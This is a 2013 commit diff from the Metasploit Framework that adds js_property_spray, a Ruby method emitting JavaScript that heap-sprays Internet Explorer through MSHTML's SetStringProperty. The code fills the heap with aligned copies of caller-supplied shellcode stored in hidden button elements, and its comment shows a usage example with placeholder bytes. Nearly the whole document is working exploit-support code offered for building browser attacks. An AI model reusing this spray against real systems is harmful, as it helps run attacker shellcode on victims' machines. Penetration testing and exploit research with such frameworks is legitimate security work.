Merge branch 'setstringproperty_spray' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-setstringproperty_spray

2013-02-28 23:35:37 +01:00 · 2013-02-28 23:35:37 +01:00 · e1891f0836
parent 8f58c7b25e 18c0bb0ac8
commit e1891f0836
1 changed files with 64 additions and 0 deletions
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@ -792,6 +792,70 @@ protected
 		return js
 	end

+	#
+	# This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty)
+	# function to trigger allocations by ntdll!RtlAllocateHeap.  It is based on Corelan's
+	# publication on "DEPS – Precise Heap Spray on Firefox and IE10".
+	#
+	# The "sprayHeap" JavaScript function supports the following arguments:
+	#   shellcode     => The shellcode to spray in JavaScript.
+	#   objId         => Optional. The ID for a <div> HTML tag.
+	#   offset        => Optional. Number of bytes to align the shellcode, default: 0x104
+	#   heapBlockSize => Optional. Allocation size, default: 0x80000
+	#   maxAllocs     => Optional. Number of allocation calls, default: 0x350
+	#
+	# Example of using the 'sprayHeap' function:
+	#   <script>
+	#   #{spray}
+	#
+	#   var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444");
+	#   sprayHeap({shellcode:s, heapBlockSize:0x80000});
+	#   </script>
+	#
+	def js_property_spray
+		js = %Q|
+		var div_container;
+		function sprayHeap( oArg ) {
+
+			shellcode     = oArg.shellcode;
+			offset        = oArg.offset;
+			heapBlockSize = oArg.heapBlockSize;
+			maxAllocs     = oArg.maxAllocs;
+			objId         = oArg.objId;
+
+			if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+			if (offset        == undefined)  { offset        = 0x104; }
+			if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+			if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+			if (offset > 0x800) { throw "Bad alignment"; }
+
+			div_container = document.getElementById(objId);
+
+			if (div_container == null) {
+				div_container = document.createElement("div");
+			}
+
+			div_container.style.cssText = "display:none";
+			var data;
+			junk = unescape("%u2020%u2020");
+			while (junk.length < offset+0x1000) junk += junk;
+
+			data = junk.substring(0,offset) + shellcode;
+			data += junk.substring(0,0x800-offset-shellcode.length);
+
+			while (data.length < heapBlockSize) data += data;
+
+			for (var i = 0; i < maxAllocs; i++)
+			{
+				var obj = document.createElement("button");
+				obj.title = data.substring(0, (heapBlockSize-2)/2);
+				div_container.appendChild(obj);
+			}
+		}
+		|
+	end
+
 	def js_heap_spray
 		js = %Q|var memory = new Array();
 function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {